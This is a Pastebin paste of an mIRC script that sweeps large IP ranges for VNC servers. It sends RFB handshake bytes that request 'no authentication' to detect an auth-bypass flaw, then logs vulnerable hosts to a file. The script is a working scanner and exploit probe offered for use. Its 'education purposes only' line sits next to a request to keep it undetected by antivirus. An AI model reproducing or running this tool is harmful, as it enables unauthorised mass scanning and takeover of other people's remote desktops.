Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ;Copy code into your mIRC remote scripts
- ;Syntax is /rvnc <ip.ip.ip.ip> <port>
- ;ex: /rvnc 192.168.0.0 5900
- ;above command will scan from 192.168.0.0 to 192.255.255.255 then halt.
- ;Illegal if you decide to scan IP addresses not in your network
- ;Education purposes only. Please keep undetected from antiviruses as this code is CLEAN!!!
- on *:sockopen:vncscan*:{
- if ($sockerr) { return }
- }
- on *:sockread:vncscan*:{
- :nextread
- sockread &vnc
- if ($sockbr == 0) return
- echo @vnc $sock($sockname).ip : $+ $sock($sockname).port $bvar(&vnc,1,$bvar(&vnc,0)).text --- $bvar(&vnc,1,$bvar(&vnc,0))
- if (0*0*0*0* iswm $bvar(&vnc,1,$bvar(&vnc,0))) sockmark $sockname VULN
- if (*003.008* iswm $bvar(&vnc,1,$bvar(&vnc,0)).text) { bset &bytes 1 82 70 66 32 48 48 51 46 48 48 56 0 | sockwrite -bn $sockname -1 &bytes }
- bset &bytes 1 01 02
- sockwrite -bn $sockname -1 &bytes
- bset &bytes 1 01
- sockwrite -bn $sockname -1 &bytes
- checkvnc $sockname
- goto nextread
- }
- alias checkvnc {
- if ($sock($1).mark == VULN) { write VNC_bypauth.txt $sock($1).ip : $+ $sock($1).port VULNERABLE | echo @vnc 9,3 $sock($1).ip $+ : $+ $sock($1).port VNC VULNERABLE }
- }
- alias rvnc {
- set %interval 200
- window -ae @vnc
- unset %range*
- set %range1 $gettok($1,1,46)
- set %range2 $gettok($1,2,46)
- set %range3 $gettok($1,3,46)
- .timerRANGEr -om 0 %interval nextvnc $2-
- echo @vnc Starting at $1 on Port $2
- }
- alias nextvnc {
- :START
- set %temp $r(0,99999999999999999999999999999)
- if ($sock(vncscan $+ %temp).name != $null) goto START
- inc %range4
- sockopen vncscan $+ %temp %range1 $+ . $+ %range2 $+ . $+ %range3 $+ . $+ %range4 $1
- goto next
- :NEXT
- if (%range4 >= 255) { inc %range3 | set %range4 0 }
- if (%range3 >= 255) { inc %range2 | set %range3 0 }
- if (%range2 >= 255) { unset %range* | echo @vnc VNC Scan halted. | .timerRANGE off | halt }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement